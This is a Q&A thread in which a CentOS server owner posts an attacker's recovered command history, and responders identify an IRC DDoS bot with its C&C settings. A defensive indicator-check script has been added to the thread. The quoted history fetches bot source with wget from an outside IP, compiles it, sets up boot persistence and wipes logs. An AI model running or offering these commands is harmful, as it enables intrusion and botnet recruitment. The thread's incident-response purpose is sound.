10

We logged remotely into our CentOS server today using Putty, and while wandering through previous commands using the up arrow, stumbled across the following:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(&&'s replaced with newlines for clarity)

I never ran these commands, EVER! How did this happen? Is my server being hacked? I immediately changed my root password, but was hoping someone could make heads or tails of what's happening over here.

I see references made in the source to DDoS bots, and my colleague and I are seriously concerned!

Thanks in advance!

Josef van Niekerk
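As an added example that is not part of the original post or any of the answers: a shell check for the specific artifacts the command history above would leave behind, usable against the live system or a mounted forensic copy. The indicator paths come straight from the history in the question; the function name, the root-prefix argument and the output format are my own assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Checks a filesystem prefix for the
# artifacts the attacker's history would create. The paths are the ones listed in
# the question; the function name and output format are constructed for this example.
#
# Usage: check_compromise_indicators [ROOT]
#   ROOT is "" (default) for the live system, or the mount point of an image.
# Prints one "FOUND:" line per indicator; returns 1 if anything was found, 0 if clean.
check_compromise_indicators() {
    root="${1:-}"
    found=0

    # Staging directory, compiled bot and the renamed support script from the history
    for p in /usr/lib/tmp /bin/bot /etc/init.d/httpd2 /etc/init.d/network.bp; do
        if [ -e "$root$p" ]; then
            echo "FOUND: $root$p"
            found=1
        fi
    done

    # Persistence: /etc/init.d/network was rewritten to launch httpd2 at boot
    if [ -f "$root/etc/init.d/network" ] \
        && grep -q 'nohup /etc/init.d/httpd2' "$root/etc/init.d/network"; then
        echo "FOUND: persistence hook in $root/etc/init.d/network"
        found=1
    fi

    # Anti-forensics: lastlog truncated to zero bytes (cat /dev/null > /var/log/lastlog).
    # Note: a freshly installed system may also have an empty lastlog, so treat this
    # as corroborating evidence rather than proof on its own.
    if [ -f "$root/var/log/lastlog" ] && [ ! -s "$root/var/log/lastlog" ]; then
        echo "FOUND: $root/var/log/lastlog is empty (possible log wipe)"
        found=1
    fi

    return "$found"
}
```

Run it as root on the suspect box, or point ROOT at a read-only mount of its disk image so the check does not touch the evidence.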

6 Answers

7

Yes, you have been hacked. The hacker installed an IRC backdoor and you are connecting to this IRC server:

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

The bot herder can execute any commands on your server. I recommend shutting down the server and reinstalling immediately. The bot has a few DDoS attack features: DNS flood, SYN flood and ICMP flood. It also works on Windows, which is pretty cool. There is a really old spreading module to infect MyDoom. This looks like some old malware.

Rook
6

The answer is in any case yes, your server is being or has been compromised.

You should cut off the Internet connection to the server immediately, make a full backup (bear in mind other files may be compromised, too), and reinstall.

Also, you may want to notify the owners of the IP the bot net (or whatever this is) is run from. Here is the RIPE whois data.

Pekka
1

Never allow root login via SSH.

Peter D
0

The answer to your question is: YES

cherouvim
0

Sounds like you've been infected with BOT_VERSION where BOT_VERSION is

#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

Didn't your Linux antivirus pick this up?

0

I probably would have sanitized the ip address of the C&C machine before posting.

jbroome